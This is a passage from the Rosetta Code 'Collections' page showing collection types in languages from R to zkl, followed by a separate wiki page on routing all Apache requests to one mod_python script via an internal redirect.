e=5+6)) $a [1] 123 $b [1] "abc" [[3]] [1] TRUE [[4]] [1] 1 2 3 4 5 $c $c$d [1] 0.6013157 0.5011909 0.7106448 0.3882265 0.1274939 $c$e [1] 11 Data Frames[edit] Data frames are like a cross between a list and a matrix. Each row represents one "record", or a collection of variables. data.frame(name=c("Alice", "Bob", "Carol"), age=c(23, 35, 17)) name age 1 Alice 23 2 Bob 35 3 Carol 17 Racket[edit] As in other lisps, the simple kind of linked lists are the most common collection-of-values type. #lang racket ;; create a list (list 1 2 3 4) ;; create a list of size N (make-list 100 0) ;; add an element to the front of a list (non-destructively) (cons 1 (list 2 3 4)) Racket comes with about 7000 additional types that can be considered as a collection of values, but it's not clear whether this entry is supposed to be a laundry list... Raven[edit] Numerically indexed List: [ 1 2 3 'abc' ] as a_list a_list print list (4 items) 0 => 1 1 => 2 2 => 3 3 => "abc" String key indexed Hash: { 'a' 1 'b' 2 } as a_hash a_hash print hash (2 items) a => 1 b => 2 Set items: 17 a_list 1 set # set second item 42 a_hash 'b' set # set item with key 'b' 42 a_hash:b # shorthand Get items: a_list 1 get # get second item a_hash 'b' get # get item with key 'b' a_hash.b # shorthand Other stuff: 42 a_list push # append an item a_list pop # remove last item 42 a_list shove # prepend an item a_list shift # remove first item 42 a_list 1 insert # insert item second, shuffling others down a_list 1 remove # retrieve second item, shuffling others up REXX[edit] There are several ways to store collections in REXX: - stemmed arrays - lists or vectors - sparse stemmed arrays stemmed arrays[edit] To store (say) a collection of numbers (or anything, for that matter) into a stemmed array: pr.=0 /*define a default for all elements for the stemmed array.*/ pr.1 =2 /*note that this array starts at 1 (one). */ pr.2 =3 pr.3 =5 pr.4 =7 pr.6 =11 pr.6 =13 pr.7 =17 pr.8 =19 pr.9 =23 pr.10=29 pr.11=31 pr.12=37 pr.13=41 pr.14=43 y.=0 /*define a default for all years. */ y.1985 = 6020 y.1986 = 7791 y.1987 = 8244 y.1988 = 10075 x = y.2000 /*X will have a value of zero (0). */ fib.0 = 0 /*arrays may start with zero (0). */ fib.1 = 1 fib.2 = 1 fib.3 = 2 fib.4 = 3 fib.5 = 5 fib.6 = 8 fib.7 =17 do n=-5 to 5 /*define an array from -5 ──► 5 */ sawtooth.n=n end /*n*/ /*eleven elements will be defined. */ Most often, programmers will assign the zeroeth entry to the number of elements in the stemmed array: pr.0=14 /*number of entries in the stemmed array.*/ Programatically, a simple test could be performed to detect the end of the array (if there aren't any null values): do j=1 while pr.j\==0 say 'prime' j 'is' pr.j end /*j*/ /*at this point, J=15. */ j=j-1 /*J now has the count of primes stored.*/ lists or vectors[edit] To store (say) a collection of numbers (or anything, for that matter) into a list: primeList='2 3 5 7 11 13 17 19 23 29 31 37 41 43' /* or ... */ primeList= 2 3 5 7 11 13 17 19 23 29 31 37 41 43 /*in this case, the quotes (') can be dropped. */ primes=words(primeList) do j=1 for primes /*can also be coded: do j=1 to primes */ say 'prime' j 'is' word(primeList,j) end /*j*/ sparse stemmed arrays[edit] To store (say) a collection of numbers (or anything, for that matter) into a sparse stemmed array: pr.=0 /*define a default for all elements for the stemmed array.*/ pr.2 =1 pr.3 =1 pr.5 =1 pr.7 =1 pr.11=1 pr.13=1 pr.17=1 pr.19=1 pr.23=1 pr.29=1 pr.31=1 pr.37=1 pr.41=1 pr.43=1 /*─────────────────────────────────────────────────────────────────────*/ primes=0 do j=1 for 10000 /*this method isn't very efficient*/ if pr.j==0 then iterate primes = primes+1 end /*j*/ say '# of primes in list:' primes /*─────────────────────────────────────────────────────────────────────*/ #primes=0 do j=1 for 10000 /*this method isn't very efficient*/ if pr.j\==0 then #primes = #primes+1 end /*j*/ say '# of primes in list:' #primes /*─────────────────────────────────────────────────────────────────────*/ s=0 /*yet another inefficient method. */ do k=1 for 10000 /*this method isn't very efficient*/ Ps = Ps + (pn.k\==0) /*more obtuse, if ya like that. */ say 'prime' Ps "is:" k /*might as well echo the prime #. */ end /*k*/ say 'number of primes found in the list is' Ps Ring[edit] text = list(2) text[1] = "Hello " text[2] = "world!" see text[1] + text[2] + nl Output: Hello world! Ruby[edit] Array[edit] Arrays are ordered, integer-indexed collections of any object. # creating an empty array and adding values a = [] #=> [] a[0] = 1 #=> [1] a[3] = "abc" #=> [1, nil, nil, "abc"] a << 3.14 #=> [1, nil, nil, "abc", 3.14] # creating an array with the constructor a = Array.new #=> [] a = Array.new(3) #=> [nil, nil, nil] a = Array.new(3, 0) #=> [0, 0, 0] a = Array.new(3){|i| i*2} #=> [0, 2, 4] Hash[edit] A Hash is a dictionary-like collection of unique keys and their values. Also called associative arrays, they are similar to Arrays, but where an Array uses integers as its index, a Hash allows you to use any object type. # creating an empty hash h = {} #=> {} h["a"] = 1 #=> {"a"=>1} h["test"] = 2.4 #=> {"a"=>1, "test"=>2.4} h[3] = "Hello" #=> {"a"=>1, "test"=>2.4, 3=>"Hello"} h = {a:1, test:2.4, World!:"Hello"} #=> {:a=>1, :test=>2.4, :World!=>"Hello"} # creating a hash with the constructor h = Hash.new #=> {} (default value : nil) p h[1] #=> nil h = Hash.new(0) #=> {} (default value : 0) p h[1] #=> 0 p h #=> {} h = Hash.new{|hash, key| key.to_s} #=> {} p h[123] #=> "123" p h #=> {} h = Hash.new{|hash, key| hash[key] = "foo#{key}"} #=> {} p h[1] #=> "foo1" p h #=> {1=>"foo1"} Struct[edit] A Struct is a convenient way to bundle a number of attributes together, using accessor methods, without having to write an explicit class. # creating a struct Person = Struct.new(:name, :age, :sex) a = Person.new("Peter", 15, :Man) p a[0] #=> "Peter" p a[:age] #=> 15 p a.sex #=> :Man p a.to_a #=> ["Peter", 15, :Man] p a.to_h #=> {:name=>"Peter", :age=>15, :sex=>:Man} b = Person.new p b #=> #<struct Person name=nil, age=nil, sex=nil> b.name = "Margaret" b["age"] = 18 b[-1] = :Woman p b.values #=> ["Margaret", 18, :Woman] p b.members #=> [:name, :age, :sex] p b.size #=> 3 c = Person["Daniel", 22, :Man] p c.to_h #=> {:name=>"Daniel", :age=>22, :sex=>:Man} Set[edit] Set implements a collection of unordered values with no duplicates. This is a hybrid of Array's intuitive inter-operation facilities and Hash's fast lookup. require 'set' # different ways of creating a set p s1 = Set[1, 2, 3, 4] #=> #<Set: {1, 2, 3, 4}> p s2 = [8, 6, 4, 2].to_set #=> #<Set: {8, 6, 4, 2}> p s3 = Set.new(1..4) {|x| x*2} #=> #<Set: {2, 4, 6, 8}> # Union p s1 | s2 #=> #<Set: {1, 2, 3, 4, 8, 6}> # Intersection p s1 & s2 #=> #<Set: {4, 2}> # Difference p s1 - s2 #=> #<Set: {1, 3}> p s1 ^ s2 #=> #<Set: {8, 6, 1, 3}> p s2 == s3 #=> true p s1.add(5) #=> #<Set: {1, 2, 3, 4, 5}> p s1 << 0 #=> #<Set: {1, 2, 3, 4, 5, 0}> p s1.delete(3) #=> #<Set: {1, 2, 4, 5, 0}> Matrix and Vector[edit] The Matrix and Vector class represents a mathematical matrix and vector. require 'matrix' # creating a matrix p m0 = Matrix.zero(3) #=> Matrix[[0, 0, 0], [0, 0, 0], [0, 0, 0]] p m1 = Matrix.identity(3) #=> Matrix[[1, 0, 0], [0, 1, 0], [0, 0, 1]] p m2 = Matrix[[11, 12], [21, 22]] #=> Matrix[[11, 12], [21, 22]] p m3 = Matrix.build(3) {|row, col| row - col} #=> Matrix[[0, -1, -2], [1, 0, -1], [2, 1, 0]] p m2[0,0] #=> 11 p m1 * 5 #=> Matrix[[5, 0, 0], [0, 5, 0], [0, 0, 5]] p m1 + m3 #=> Matrix[[1, -1, -2], [1, 1, -1], [2, 1, 1]] p m1 * m3 #=> Matrix[[0, -1, -2], [1, 0, -1], [2, 1, 0]] # creating a Vector p v1 = Vector[1,3,5] #=> Vector[1, 3, 5] p v2 = Vector[0,1,2] #=> Vector[0, 1, 2] p v1[1] #=> 3 p v1 * 2 #=> Vector[2, 6, 10] p v1 + v2 #=> Vector[1, 4, 7] p m1 * v1 #=> Vector[1, 3, 5] p m3 * v1 #=> Vector[-13, -4, 5] OpenStruct[edit] An OpenStruct is a data structure, similar to a Hash, that allows the definition of arbitrary attributes with their accompanying values. require 'ostruct' # creating a OpenStruct ab = OpenStruct.new p ab #=> #<OpenStruct> ab.foo = 25 p ab.foo #=> 25 ab[:bar] = 2 p ab["bar"] #=> 2 p ab #=> #<OpenStruct foo=25, bar=2> ab.delete_field("foo") p ab.foo #=> nil p ab #=> #<OpenStruct bar=2> p son = OpenStruct.new({ :name => "Thomas", :age => 3 }) #=> #<OpenStruct name="Thomas", age=3> p son.name #=> "Thomas" p son[:age] #=> 3 son.age += 1 p son.age #=> 4 son.items = ["candy","toy"] p son.items #=> ["candy","toy"] p son #=> #<OpenStruct name="Thomas", age=4, items=["candy", "toy"] Rust[edit] Rust has quite a few collections built in. Stack-allocated collections[edit] Array[edit] Arrays ( [T]) are stack allocated, fixed size collections of items of the same type. let a = [1u8,2,3,4,5]; // a is of type [u8; 5]; let b = [0;256] // Equivalent to `let b = [0,0,0,0,0,0... repeat 256 times]` Slice[edit] Slices ( &[T]) are dynamically sized views into contiguous sequences (arrays, vectors, strings) let array = [1,2,3,4,5]; let slice = &array[0..2] println!("{:?}", slice); - Output: [1,2] String slice[edit] String slices are ( str) are slices of Unicode characters. Plain strs are almost never seen in Rust. Instead either heap-allocated Strings or borrowed string slices ( &str which is basically equivalent to a slice of bytes: &[u8]) are more often used. It should be noted that strings are not indexable as they are UTF-8 (meaning that characters are not necessarily of a fixed size) however iterators can be created over codepoints or graphemes. Heap-allocated collections[edit] Vector[edit] Vectors ( Vec<T>) are a growable list type. According to the Rust documentation, you want to use a Vector. let mut v = Vec::new(); v.push(1); v.push(2); v.push(3); // Or (mostly) equivalently via a convenient macro in the standard library let v = vec![1,2,3]; String[edit] Strings are growable strings stored as a UTF-8 buffer which are just Vec<u8>s under the hood. Like strs, they are not indexable (for the same reasons) but iterators can be created over the graphemes, codepoints or bytes therein. let x = "abc"; // x is of type &str (a borrowed string slice) let s = String::from(x); // or alternatively let s = x.to_owned(); VecDequeue[edit] A growable ring buffer. According to the Rust documentation you should use VecDequeue<T> when: - You want a Vec that supports efficient insertion at both ends of the sequence. - You want a queue. - You want a double-ended queue (deque). Linked List[edit] A doubly-linked list. According to the Rust documentation, you should use it when: - You want a Vec or VecDeque of unknown size, and can't tolerate amortization. - You want to efficiently split and append lists. - You are absolutely certain you really, truly, want a doubly linked list. HashMap[edit] A hash map implementation which uses linear probing with Robin Hood bucket stealing. According to the Rust documentation, you should use it when: - You want to associate arbitrary keys with an arbitrary value. - You want a cache. - You want a map, with no extra functionality. BTreeMap[edit] A map based on a B-Tree. According to the Rust documentation, you should use it when: - You're interested in what the smallest or largest key-value pair is. - You want to find the largest or smallest key that is smaller or larger than something. - You want to be able to get all of the entries in order on-demand. - You want a sorted map. HashSet/BTreeSet[edit] Set implementations that use an empty tuple () as the value of their respective maps (and implement different methods). They should be used when: - You just want to remember which keys you've seen. - There is no meaningful value to associate with your keys. - You just want a set. BinaryHeap[edit] A priority queue implemented with a binary heap. You should use it when - You want to store a bunch of elements, but only ever want to process the "biggest" or "most important" one at any given time. - You want a priority queue. Scala[edit]Scala has in his run-time library a rich set set of collections. Due to use of traits is this library easily realized and consistent. Collections provide the same operations on any type where it makes sense to do so. For instance, a string is conceptually a sequence of characters. Consequently, in Scala collections, strings support all sequence operations. The same holds for arrays. The collections are available in two flavors; immutable (these have no methods to modify or update) and mutable. With these properties they are also available in concurrent version for parallel processing. Switching between sequential and parallel can easily be done by adding a .seq or .par post-fix.These examples were taken from a Scala REPL session. The second lines are the REPL responces. Windows PowerShell PS C:\Users\FransAdm> scala Welcome to Scala version 2.10.1 (Java HotSpot(TM) 64-Bit Server VM, Java 1.7.0_25). Type in expressions to have them evaluated. Type :help for more information. scala> // Immutable collections do not and cannot change the instantiated object scala> // Lets start with Lists scala> val list = Nil // Empty List list: scala.collection.immutable.Nil.type = List() scala> val list2 = List("one", "two") // List with two elements (Strings) list2: List[String] = List(one, two) scala> val list3 = 3 :: list2 // prepend 3 to list2, using a special operator list3: List[Any] = List(3, one, two) scala> // The result was a mixture with a Int and Strings, so the common superclass Any is used. scala> // Let test the Set collection scala> val set = Set.empty[Char] // Empty Set of Char type set: scala.collection.immutable.Set[Char] = Set() scala> val set1 = set + 'c' // add an element set1: scala.collection.immutable.Set[Char] = Set(c) scala> val set2 = set + 'a' + 'c' + 'c' // try to add another and the same element twice set2: scala.collection.immutable.Set[Char] = Set(a, c) scala> // Let's look at the most universal map: TrieMap (Cache-aware lock-free concurrent hash trie) scala> val capital = collection.concurrent.TrieMap("US" -> "Washington", "France" -> "Paris") // This map is mutable capital: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington, France -> Paris) scala> capital - "France" // This is only an expression, does not modify the map itself res0: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington) scala> capital += ("Tokio" -> "Japan") // Adding an element, object is changed - not the val capital res1: capital.type = TrieMap(US -> Washington, Tokio -> Japan, France -> Paris) scala> capital // Check what we have sofar res2: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington, Tokio -> Japan, France -> Paris) scala> val queue = new scala.collection.mutable.Queue[String] queue: scala.collection.mutable.Queue[String] = Queue() scala> queue += "first" res17: queue.type = Queue("first") scala> queue += "second" res19: queue.type = Queue("first", "second") scala> import collection.concurrent.TrieMap // super concurrent mutable hashmap val map = TrieMap("Amsterdam" -> "Netherlands", "New York" -> "USA", "Heemstede" -> "Netherlands") map("Laussanne") = "Switzerland" // 2 Ways of updating map += ("Tokio" -> "Japan") assert(map("New York") == "USA") assert(!map.isDefinedAt("Gent")) // isDefinedAt is false assert(map.isDefinedAt("Laussanne")) // true val hash = new TrieMap[Int, Int] hash(1) = 2 hash += (1 -> 2) // same as hash(1) = 2 hash += (3 -> 4, 5 -> 6, 44 -> 99) hash(44) // 99 hash.contains(33) // false hash.isDefinedAt(33) // same as contains hash.contains(44) // true // iterate over key/value // hash.foreach { case (key, val) => println( "key " + e._1 + " value " + e._2) } // e is a 2 element Tuple // same with for syntax for ((k, v) <- hash) println("key " + k + " value " + v) // // items in map where the key is greater than 3 map.filter { k => k._1 > 3 } // Map(5 -> 6, 44 -> 99) // // same with for syntax for ((k, v) <- map; if k > 3) yield (k, v) Scheme[edit] list[edit] (list obj ...) returns a newly allocated list of its arguments. Example: (display (list 1 2 3)) (newline) (display (list)) (newline) - Output: (1 2 3) () cons[edit] (cons obj lst) returns a newly allocated list consisting of obj prepended to lst. Example: (display (cons 0 (list 1 2 3))) (newline) - Output: (0 1 2 3) append[edit] (append lst ...) returns a newly allocated list consisting of the elements of lst followed by the elements of the other lists. Example: (display (append (list 1 2 3) (list 4 5 6))) (newline) - Output: (1 2 3 4 5 6) Seed7[edit] set[edit] $ include "seed7_05.s7i"; enable_output(set of string); const proc: main is func local var set of string: aSet is {"iron", "copper"}; begin writeln(aSet); incl(aSet, "silver"); writeln(aSet); end func; array[edit] $ include "seed7_05.s7i"; const proc: main is func local var array string: anArray is [] ("iron", "copper"); var string: element is ""; begin for element range anArray do write(element <& " "); end for; writeln; anArray &:= "silver"; for element range anArray do write(element <& " "); end for; writeln; end func; hash[edit] $ include "seed7_05.s7i"; const type: aHashType is hash [string] string; const proc: main is func local var aHashType: aHash is aHashType.value; var string: aValue is ""; var string: aKey is ""; begin aHash @:= ["gold"] "metal"; aHash @:= ["helium"] "noble gas"; for aValue key aKey range aHash do writeln(aKey <& ": " <& aValue); end for;a end func; Setl4[edit] Set[edit] set = new('set 5 10 15 20 25 25') add(set,30) show(set) show.eval('member(set,5)') show.eval('member(set,6)') show.eval("exists(set,'eq(this,10)')") show.eval("forall(set,'eq(this,40)')") Iter[edit] iter = new('iter 1 10 2') show(iter) show.eval("eq(set.size(iter),5)") show.eval('member(iter,5)') Map[edit] map = new('map one:1 two:2 ten:10 forty:40 hundred:100 thousand:1000') show(map) show.eval("eq(get(map,'one'),1)") show.eval("eq(get(map,'one'),6)") show.eval("exists(map,'eq(get(map,this),2)')") show.eval("forall(map,'eq(get(map,this),2)')") Sidef[edit] Array[edit] Arrays are ordered, integer-indexed collections of any object. # creating an empty array and adding values var a = [] #=> [] a[0] = 1 #=> [1] a[3] = "abc" #=> [1, nil, nil, "abc"] a << 3.14 #=> [1, nil, nil, "abc", 3.14] Hash[edit] A Hash is a dictionary-like collection of unique keys and their values. Also called associative arrays, they are similar to Arrays, but where an Array uses integers as its index, a Hash allows you to use any object type, which is automatically converted into a String. # creating an empty hash var h = Hash() #=> Hash() h{:foo} = 1 #=> Hash("foo"=>1) h{:bar} = 2.4 #=> Hash("foo"=>1, "bar"=>2.4) h{:bar} += 3 #=> Hash("foo"=>1, "bar"=>5.4) Pair[edit] A Pair is an array-like collection, but restricted only to two elements. # create a simple pair var p = Pair('a', 'b') say p.first; #=> 'a' say p.second; #=> 'b' # create a pair of pairs var pair = 'foo':'bar':'baz':(); # => Pair('foo', Pair('bar', Pair('baz', nil))) # iterate over the values of a pair of pairs loop { say pair.first; #=> 'foo', 'bar', 'baz' pair = pair.second; pair == nil && break; } Struct[edit] A Struct is a convenient way to bundle a number of attributes together. # creating a struct struct Person { String name, Number age, String sex } var a = Person("John Smith", 41, :man) a.age += 1 # increment age a.name = "Dr. #{a.name}" # update name say a.name #=> "Dr. John Smith" say a.age #=> 42 say a.sex #=> "man" Slate[edit] {1. 2. 3. 4. 5} collect: [|:x| x + 1]. "--> {2. 3. 4. 5. 6}" {1. 2. 3. 4. 5} select: #isOdd `er. "--> {1. 3. 5}" ({3. 2. 7} collect: #+ `er <- 3) sort. "--> {"SortedArray traitsWindow" 5. 6. 10}" ExtensibleArray new `>> [addLast: 3. addFirst: 4. ]. "--> {"ExtensibleArray traitsWindow" 4. 3}" Smalltalk[edit] Smalltalk has several collection classes (indeed the class Collection is the parent of a long list of subclasses), being the word collection rather generic (an array indexed by integers is a collection too, and in some languages it's the only primitive collection available). In this code I show how to add elements (which for each collection kind can be mixed) to five kind of Smalltalk collection: - OrderedCollection: elements are kept in the order they are added; - Bag: for each element, a count of how many times it appears is kept. So objects appear only once, but we can know how many we added in the bag; - Set: a set. Elements appear only once, adding an existing object won't change the set; if we want to know if we added the same object several time, we use a Bag; - SortedCollection: elements-objects are sorted (every comparable object can be added, and if we want different sorting criteria, we can give our custom comparator through sortBlock); - Dictionary: objects are indexed by an arbitrary key, e.g. a string |anOrdered aBag aSet aSorted aSorted2 aDictionary| anOrdered := OrderedCollection new. anOrdered add: 1; add: 5; add: 3. anOrdered printNl. aBag := Bag new. aBag add: 5; add: 5; add: 5; add: 6. aBag printNl. aSet := Set new. aSet add: 10; add: 5; add: 5; add: 6; add: 10. aSet printNl. aSorted := SortedCollection new. aSorted add: 10; add: 9; add: 8; add: 5. aSorted printNl. "another sorted with custom comparator: let's sort the other collections according to their size (number of elements)" aSorted2 := SortedCollection sortBlock: [ :a :b | (a size) < (b size) ]. aSorted2 add: anOrdered; add: aBag; add: aSet; add: aSorted. aSorted2 printNl. aDictionary := Dictionary new. aDictionary at: 'OrderedCollection' put: anOrdered; at: 'Bag' put: aBag; at: 'Set' put: aSet; at: 'SortedCollection' put: { aSorted. aSorted2 }. aDictionary printNl. Output: OrderedCollection (1 5 3 ) Bag(5:3 6:1 ) Set (10 5 6 ) SortedCollection (5 8 9 10 ) SortedCollection (Set (10 5 6 ) OrderedCollection (1 5 3 ) Bag(5:3 6:1 ) SortedCollection (5 8 9 10 ) ) Dictionary ( 'SortedCollection'->(SortedCollection (5 8 9 10 ) SortedCollection (Set (10 5 6 ) OrderedCollection (1 5 3 ) Bag(5:3 6:1 ) SortedCollection (5 8 9 10 ) ) ) 'OrderedCollection'->OrderedCollection (1 5 3 ) 'Set'->Set (10 5 6 ) 'Bag'->Bag(5:3 6:1 ) ) Tcl[edit] Tcl has 3 fundamental collection types: list, array and dictionary. A Tcl list is called an array in other languages (an integer-indexed list of values). set c [list] ;# create an empty list # fill it lappend c 10 11 13 set c [linsert $c 2 "twelve goes here"] # iterate over it foreach elem $c {puts $elem} # pass to a proc proc show_size {l} { puts [llength $l] } show_size $c A Tcl array is an associative array (aka hash). Arrays are collections of variables indexable by name, and not collections of values. An array cannot be passed to a procedure be value: it must either be passed by name or by its serialized representation. Tcl arrays also are strictly one-dimensional: arrays cannot be nested. However, multi-dimensional arrays can be simulated with cleverly constructed key strings. # create an empty array array set h {} # add some pair set h(one) 1 set h(two) 2 # add more data array set h {three 3 four 4 more {5 6 7 8}} # iterate over it in a couple of ways foreach key [array names h] {puts "$key -> $h($key)"} foreach {key value} [array get h] {puts "$key -> $value"} # pass by name proc numkeys_byname {arrayName} { upvar 1 $arrayName arr puts "array $arrayName has [llength [array names arr]] keys" } numkeys_byname h # pass serialized proc numkeys_bycopy {l} { array set arr $l puts "array has [llength [array names arr]] keys" } numkeys_bycopy [array get h] A Tcl dictionary is an associative array value that contains other values. Hence dictionaries can be nested and arbitrarily deep data structures can be created. # create an empty dictionary set d [dict create] dict set d one 1 dict set d two 2 # create another set e [dict create three 3 four 4] set f [dict merge $d $e] dict set f nested [dict create five 5 more [list 6 7 8]] puts [dict get $f nested more] ;# ==> 6 7 8 TUSCRIPT[edit] $$ MODE TUSCRIPT collection=* DATA apple DATA banana DATA orange morestuff=* DATA peaches DATA apple collection=APPEND(collection,morestuff) TRACE *collection Output: collection = * 1 = apple 2 = banana 3 = orange 4 = peaches 5 = apple UNIX Shell[edit] "Advanced" unix shells have indexed array and associative array collections. Indexed arrays[edit] a_index=(one two three) # create an array with a few elements a_index+=(four five) # append some elements a_index[9]=ten # add a specific index for elem in "${a_index[@]}"; do # interate over the elements echo "$elem" done for idx in "${!a_index[@]}"; do # interate over the array indices printf "%d\t%s\n" $idx "${a_index[idx]}" done Associative arrays[edit] declare -A a_assoc=([one]=1 [two]=2 [three]=3) # create an array with a few elementsChange a_assoc+=([four]=4 [five]=5) # add some elements a_assoc[ten]=10 for value in "${a_assoc[@]}"; do # interate over the values echo "$value" done for key in "${!a_assoc[@]}"; do # interate over the array indices printf "%s\t%s\n" "$key" "${a_assoc[$key]}" done declare -Ato typeset -A Ursala[edit] There are several kinds of collections in Ursala that are supported by having their own operators and type constructors associated with them. All storage is immutable, but one may "add" to a collection by invoking a function that returns a new collection from it. The examples shown below populate the collections with primitive types expressed literally, but they could also be aggregate or abstract types, functions, symbolic names or expressions. Lists[edit] Lists are written as comma-separated sequences enclosed in angle brackets, or with the head and tail separated by a colon. x = <1,5,6> y = <'foo','bar'> z = 3:<6,8> This function takes a pair of a new head and an existing list, and returns one that has the new head "added" to it. foo ("newhead","existing-list") = "newhead":"existing-list" Sets[edit] Sets are comma separated sequences enclosed in braces. The order and multiplicities of elements are ignored, so that the followng declarations are equivalent. x = {'a','b'} y = {'b','a'} z = {'a','b','a'} Modules[edit] Modules are lists in a particular form used to represent key:value pairs, with the key being a character string. m = <'foo': 1,'bar': 2,'baz': 3> A module or any list of pairs can be reified into a function (a.k.a., a hash or finite map) and used in any context where a function is usable, assuming the keys are mutually distinct. Trees[edit] Trees are written in the form ^:, where is the root and is a list of subtrees, which can be of any length. x = 'z'^: < 'x'^: < '7'^: <>, '?'^: <'D'^: <>>>, 'a'^: <'E'^: <>,'j'^: <>>, 'b'^: <'i'^: <>>, 'c'^: <>> A-trees[edit] A-trees allow faster access than trees by using a different representation wherein data are stored only in the leaves at a constant depth. x = [ 4:0: 'foo', 4:1: 'bar', 4:2: 'baz', 4:3: 'volta', 4:4: 'pramim'] Grids[edit] Grids are similar to lists of A-trees satisfying certain additional invariants. They represent a rooted, directed graph in which the nodes are partitioned by levels and edges exist only between nodes in consecutive levels. This type of data structure is ubiquitous in financial derivatives applications. This example shows a grid of floating point numbers. The colon separated numbers (e.g., 4:10) are used in grids of any type as addresses, with each node including a list of the addresses of its descendents in the next level. g = < [0:0: -9.483639e+00^: <4:10,4:14>], [ 4:14: -9.681900e+00^: <4:15>, 4:10: 2.237330e+00^: <4:7>], [ 4:15: -2.007562e+00^: <5:5>, 4:7: 2.419021e+00^: <5:5,5:15>], [ 5:15: 8.215451e+00^: <11:118>, 5:5: 4.067704e+00^: <11:741>], [ 11:741: -7.608967e+00^: <8:68>, 11:118: -1.552837e+00^: <8:68,8:208>], [ 8:208: 5.348115e+00^: <4:7,4:9,4:12>, 8:68: -9.066821e+00^: <4:9,4:12>], [ 4:12: -3.460494e+00^: <>, 4:9: 2.840319e+00^: <>, 4:7: -2.181140e+00^: <>]> V[edit] A quote is used for the same purpose in V [4 3 2 1] 5 swap cons =[5 4 3 2 1] Vim Script[edit] Vim Script has two collection types: List and Dictionary. See Arrays for basic operations on a List and Associative_array/Creation for basic operations on a Dictionary. VBA[edit] VBA has a built in collection type Dim coll As New Collection coll.Add "apple" coll.Add "banana" Visual Basic .NET[edit] Dim toys As New List(Of String) toys.Add("Car") toys.Add("Boat") toys.Add("Train") Visual FoxPro[edit] Visual FoxPro has a built in Collection class. LOCAL loColl As Collection, o, a1, a2, a3 a1 = CREATEOBJECT("animal", "dog", 4) a2 = CREATEOBJECT("animal", "chicken", 2) a3 = CREATEOBJECT("animal", "snake", 0) loColl = NEWOBJECT("Collection") loColl.Add(a1) loColl.Add(a2) loColl.Add(a3) FOR EACH o IN loColl FOXOBJECT ? o.Name, o.Legs ENDFOR DEFINE CLASS animal As Custom Legs = 0 PROCEDURE Init(tcName, tnLegs) THIS.Name = tcName THIS.Legs = tnLegs ENDPROC ENDDEFINE Wren[edit] Wren has only Map(hash) and List(array) var list = [] // Empty Array list = [1,2,3,4] list.add(5) list.clear() list = [0] * 10 list.count // 10 var map = {} map["key"] = "value" map[3] = 31 map.count // 2 map.clear() for (e in map.keys) { // Do stuff } zkl[edit] Lists: L(1,2,3).append(4); //-->L(1,2,3,4), mutable list Read only list: ROList(1,2,3).append(4); // creates two lists Bit bucket: Data(0,Int,1,2,3) // three bytes The "Int" means treat contents as a byte stream Data(0,Int,"foo ","bar") //-->7 bytes Data(0,Int,"foo ").append("bar") //ditto Data(0,Int,"foo\n","bar").readln() //-->"foo\n" Data(0,String,"foo ","bar") //-->9 bytes (2 \0s) Data(0,String,"foo ").append("bar").readln() //-->"foo " - Programming Tasks - Basic language learning - Data Structures - Clarified and Needing Review - ABAP - Ada - Ada.Containers.Doubly Linked Lists - Ada.Containers.Vectors - Aime - ALGOL 68 - Apex - AutoHotkey - AWK - Axe - BBC BASIC - Bc - C - C++ - C sharp - Clojure - COBOL - Common Lisp - D - E - EchoLisp - Elena - Elixir - Fancy - Forth - Forth Foundation Library - Fortran - FreeBASIC - Gambas - Go - Groovy - Haskell - Icon - Unicon - J - Java - JavaScript - Jq - Julia - Kotlin - Lingo - Lisaac - Logo - Lua - Maple - Mathematica - Wolfram Language - MATLAB - Octave - NetRexx - Nim - Objeck - Objective-C - OCaml - Oforth - OoRexx - Oz - PARI/GP - Pascal - Classes - Objects - Perl - Perl 6 - Phix - PHP - PicoLisp - PL/I - PowerShell - PureBasic - Python - R - Racket - Raven - REXX - Ring - Ruby - Rust - Scala - Scheme - Seed7 - Setl4 - Sidef - Slate - Smalltalk - Tcl - TUSCRIPT - UNIX Shell - Ursala - V - Vim Script - VBA - Visual Basic .NET - Visual FoxPro - Wren - Zkl
http://rosettacode.org/wiki/Collections
CC-MAIN-2018-26
refinedweb
18,412
63.7
It's nice to have URL's that look something like this: ...rather than like this: It's more aesthetic, and it means you can rename your blog script, or use perl instead of Python. But it's hard to do that, because you have to rework the directory structure. This page tells how to handle the directories yourself, taking that work over from Python. The best news is: You don't even have to touch ModRewrite! The basic idea is: Do an InternalRedirect for all traffic on a VirtualHost to your script. In the script, ask Apache for the previous RequestObject's URI. This page assumes mod_python. If you're not using mod_python, read what you can, and it may give you hints about how to do this with your own configuration. == Redirect Traffic == Assuming you have ModPython setup, add the following lines to the VirtualHost entry: PythonPath "sys.path+['/var/www/path/to/your/script/directory/']" AddHandler python-program .py PythonPostReadRequestHandler allrqst PythonDebug on (I don't know that all of this is necessary. Someone more expert than me can correct this.) The most important line here is "PythonPostReadRequestHandler." That means that, when a request comes in, before anything is done with it, it will be sent to the "allrqst" module. The "allrqst" module will be in /var/www/path/to/your/script/directory/. Make the file "allrqst.py" in that directory, and have it read: from mod_python import apache def postreadrequesthandler(req): if req.uri != "/blog.py": req.internal_redirect( "/blog.py" ) return apache.OK That's it! That will redirect ALL TRAFFIC to your script, /blog.py, regardless of URI. But we're not done yet- we still want to have access to that old URI. == Ask Apache for the Previous URI == First, you need to tell Apache how to find blog.py. In the VirtualHostDirective, add: <Directory "/var/www/path/to/your/script/directory/"> AddHandler python-program .py PythonHandler blog PythonDebug on </Directory> Then have the code for "blog.py" will print the old URI. from mod_python import apache def handler(req): req.write( "Old URI: " + req.prev.uri ) return apache.OK == Summary == So, the basic idea is: Do an InternalRedirect for all traffic on a VirtualHost to your script. In the script, ask Apache for the previous RequestObject's URI. == Questions == Can you do the InternalRedirect without dropping into mod_python, mod_perl, or anything else? Can use just use a normal Configuration Directive?
https://developer.jboss.org/wiki/ApacheHandlingDirectoriesYourself
CC-MAIN-2018-43
refinedweb
407
69.18
